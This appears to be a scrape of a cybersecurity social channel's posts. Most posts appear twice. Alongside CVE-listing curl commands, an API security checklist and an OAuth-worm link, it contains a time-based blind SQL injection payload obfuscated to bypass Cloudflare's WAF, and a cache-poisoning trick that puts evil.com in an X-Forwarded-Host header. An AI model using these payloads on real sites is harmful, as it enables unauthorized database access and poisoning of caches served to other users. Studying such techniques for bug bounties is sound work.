How I track the latest CVEs — top 20, fast 🔥
curl -s 'https:/ /cvedb.shodan.io/cves' \
| jq -r '.cves[:20][]?.cve_id'
==> Want id+summary?
curl -s 'https:/ /cvedb.shodan.io/cves' \
| jq '[.cves
| sort_by(.published? // .Published? // .modified? // "1970-01-01")
| reverse
| .[:20][]? | {cve_id, summary}]'
Note : Make sure you remove the space between https:/ and /cvedb before using the command must be https://
Tool: cvedb.shodan.io
curl -s 'https:/ /cvedb.shodan.io/cves' \
| jq -r '.cves[:20][]?.cve_id'
==> Want id+summary?
curl -s 'https:/ /cvedb.shodan.io/cves' \
| jq '[.cves
| sort_by(.published? // .Published? // .modified? // "1970-01-01")
| reverse
| .[:20][]? | {cve_id, summary}]'
Note : Make sure you remove the space between https:/ and /cvedb before using the command must be https://
Tool: cvedb.shodan.io
Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
❌ Blocked Payload
(select(0)from(select(sleep(10)))v) → 403 Forbidden
✅ Bypass Payload
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
🔍 This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
❌ Blocked Payload
(select(0)from(select(sleep(10)))v) → 403 Forbidden
✅ Bypass Payload
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
🔍 This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
❤3
CACHE POISONING QUICK WIN:
Most apps validate X-Forwarded-Host as a single value.
But try this:
X-Forwarded-Host: http://legit.com, http://evil.com
• CDN: Reads first → Allows ✅
• App: Reads last → Injects
Most apps validate X-Forwarded-Host as a single value.
But try this:
X-Forwarded-Host: http://legit.com, http://evil.com
• CDN: Reads first → Allows ✅
• App: Reads last → Injects
🔐 *How to Secure Your APIs – A Practical Guide*
APIs are the backbone of modern apps — but without security, they become open doors to attacks. Here's how to lock them down effectively:
---
✅ *1. Use Authentication & Authorization*
- Implement *OAuth2*, *JWT*, or *API keys*
- Enforce *role-based access control (RBAC)*
---
🔐 *2. Validate Inputs Strictly*
- Sanitize user inputs
- Use strong data validation (e.g., Joi, Yup)
- Prevent SQL & NoSQL injection
---
📦 *3. Rate Limiting & Throttling*
- Control request frequency to avoid abuse
- Use tools like *NGINX*, *API Gateway*, or *Cloudflare*
---
📜 *4. Use HTTPS Everywhere*
- Encrypt all data in transit
- Never expose APIs over HTTP
---
🕵️♂️ *5. Monitor & Log*
- Track unusual behavior
- Use centralized logging (e.g., ELK, Datadog)
---
🧱 *6. CORS & Firewall Rules*
- Restrict allowed origins
- Protect using *WAFs* and IP whitelisting
---
Secure APIs = Safe apps + Protected data + Trusted users
Build smart. Build safe.
APIs are the backbone of modern apps — but without security, they become open doors to attacks. Here's how to lock them down effectively:
---
✅ *1. Use Authentication & Authorization*
- Implement *OAuth2*, *JWT*, or *API keys*
- Enforce *role-based access control (RBAC)*
---
🔐 *2. Validate Inputs Strictly*
- Sanitize user inputs
- Use strong data validation (e.g., Joi, Yup)
- Prevent SQL & NoSQL injection
---
📦 *3. Rate Limiting & Throttling*
- Control request frequency to avoid abuse
- Use tools like *NGINX*, *API Gateway*, or *Cloudflare*
---
📜 *4. Use HTTPS Everywhere*
- Encrypt all data in transit
- Never expose APIs over HTTP
---
🕵️♂️ *5. Monitor & Log*
- Track unusual behavior
- Use centralized logging (e.g., ELK, Datadog)
---
🧱 *6. CORS & Firewall Rules*
- Restrict allowed origins
- Protect using *WAFs* and IP whitelisting
---
Secure APIs = Safe apps + Protected data + Trusted users
Build smart. Build safe.
❤1🔥1
Check out today's sandwich 🙌🏻
Video
https://www.youtube.com/watch?v=H8CQ7XrCCdg
Blog
https://hacklido.com/blog/1366-the-invisible-virus-understanding-oauth-worms
Video
https://www.youtube.com/watch?v=H8CQ7XrCCdg
Blog
https://hacklido.com/blog/1366-the-invisible-virus-understanding-oauth-worms
YouTube
Oath Worms | The Silent Cybersecurity Menace
Oath Worms represent a new generation of cyber threats—self-propagating, stealthy, and highly destructive. As cybersecurity landscapes evolve, attackers are leveraging advanced malware techniques to exploit vulnerabilities faster than ever before.
This deep…
This deep…
How do you prefer to learn?
Anonymous Poll
13%
Reading textbooks or blogs
21%
Watching videos
66%
Hands-on practice
❤2